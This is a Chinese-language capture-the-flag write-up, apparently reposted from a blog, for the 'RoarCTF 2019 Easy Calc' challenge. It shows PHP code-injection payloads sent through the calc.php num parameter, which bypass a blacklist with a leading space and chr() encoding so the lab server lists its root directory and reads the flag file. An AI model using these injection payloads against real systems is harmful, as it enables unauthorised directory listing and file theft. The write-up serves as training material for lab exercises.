buuctf-web-[RoarCTF 2019]Easy Calc1
短信预约 -IT技能 免费直播动态提醒
打开环境
发现一个类似计算器的东西
尝试一些常规的测试参数
尝试单引号发现提示,但是并未报错,非sql注入
查看源代码
找到一段JavaScript脚本
访问calc.php
发现源代码
需要对num进行传参,并且有黑名单,需要进行绕过
尝试payload
http://node4.buuoj.cn:26562/calc.php?num=1;var_dump(scandir(chr(47)))
进行修改
http://node4.buuoj.cn:26562/calc.php? num=1;var_dump(scandir(chr(47)))
num参数禁止传入字母,可以在问号和num之间加入空格进行绕过
var_dump()用来打印
scandir()用来获扫描目录下文件
chr(47)是“/”的ASCII编码
进行内容读取的payload
http://node4.buuoj.cn:26562/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法
chr(47)是/的ASCII编码
chr(102)是f的ASCII编码
chr(49)是1的ASCII编码
chr(97)是a的ASCII编码
chr(103)是g的ASCII编码
flag{af9d35dd-c8bc-4185-968c-983d75685794}
来源地址:https://blog.csdn.net/qq_29977871/article/details/128730416
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
